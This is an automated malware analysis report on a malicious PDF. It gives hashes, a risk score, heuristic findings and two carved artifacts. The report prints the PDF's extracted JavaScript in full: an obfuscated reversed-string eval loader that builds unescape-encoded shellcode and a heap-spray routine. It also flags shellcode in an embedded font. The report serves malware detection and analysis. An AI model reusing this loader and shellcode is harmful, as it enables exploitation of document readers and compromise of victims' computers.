Malicious PDF — malware analysis report

Static analysis result for SHA-256 f86e18906970ae75…

MALICIOUS

PDF

68.1 KB First seen: 2013-03-04
MD5: 48d609847f721f67562d971fa0c81011 SHA-1: b69c4dbe12e5eb9f4ad32a1ae54b2cc80ede2d4c SHA-256: f86e18906970ae7584ca4b7d8adab5260bcf734dc358aeba0654d4aa1fea98f8
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 2606 bytes
SHA-256: 8d2204603c54fe43a8f4598bc74219e1578d80ef7ce2535d8a954851bc6a4ffd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )"%" ,"Q"(ecalper."6114uQacbcuQ6cc6uQ9282uQ7e9cuQ9b0auQ4860uQ9b06uQ3619uQ0a48uQf8bduQbd20uQafeduQc1a1uQfce1uQ1e99uQ118duQc766uQ0495uQ3dfbuQ9dfeuQc15fuQb0a8uQb58euQ085cuQ239duQe756uQ031cuQ0c81uQda34uQ9927uQ8b03uQ1d05uQ4c49uQ184fuQ16b6uQ7980uQ1b1cuQ3334uQ1e5euQ3d2cuQ862cuQ7a6buQ55d0uQff29uQ8997uQb6c9uQb4e9uQf8d1uQfb42uQa05buQ361auQ8c6cuQed69uQ2b5buQd33euQ5717uQ0b99uQa4cbuQc423uQ2ad8uQ48bfuQ0da0uQfe80uQce34uQa3acuQcc23uQ03c8uQ38a8uQf96fuQ87a5uQbec3uQdf48uQ2524uQ92f8uQe432uQd19cuQbd2buQ4428uQ01eduQ30e5uQdde9uQa3d8uQ88c3uQ64f4uQa4a1uQ9738uQ94aauQf1cauQ8fc1uQ6bb9uQb686uQ2df6uQ6438uQ0993uQ3d23uQ2e82uQ2e0euQa6dcuQ11f7uQ08d2uQ1f6fuQ381duQ8571uQ7130uQ1385uQ1b33uQ9c85uQ4f13uQ4742uQ579duQ5f41uQbb11uQbd9duQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0070uQ227auQ0070uQd451uQbe50uQ57eeuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQc0c0uQc0c0uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ18bfuQ2c40uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ4038uQ380cuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ9881uQb8a1uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ5185uQa5beuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ4509uQa509uQ0070uQbb51uQ0070uQ137duQ0000uQ0400uQ0000uQ0001uQ1000uQ4010uQ0000uQ0000uQ1000uQ0010uQffffuQffffuQ0070uQ45c5uQ0070uQ2e25uQ1000uQ1100uQ0070uQ7f27uQ0070uQca8auQ1000uQ0010uQ0070uQbb51uQ0070uQca8auQ1000uQ1100uQ0070uQbb51uQ0070uQ2bf7uQeff7uQ0030uQ0070uQbb51uQ0070uQd451uQ0000uQ0001uQ0070uQbb51uQ1000uQ4010uQ0070uQ7f27uQ1000uQ4210uQ0070uQ9951uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQc0c0uQc0c0uQ0070uQ4809uQ0070uQ3309uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQ0070uQ4809uQccccuQccccuQ0070uQf651uQ0070uQfe84uQccccuQccccuQ0070uQ9194uQc0c0uQc0c0uQ" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.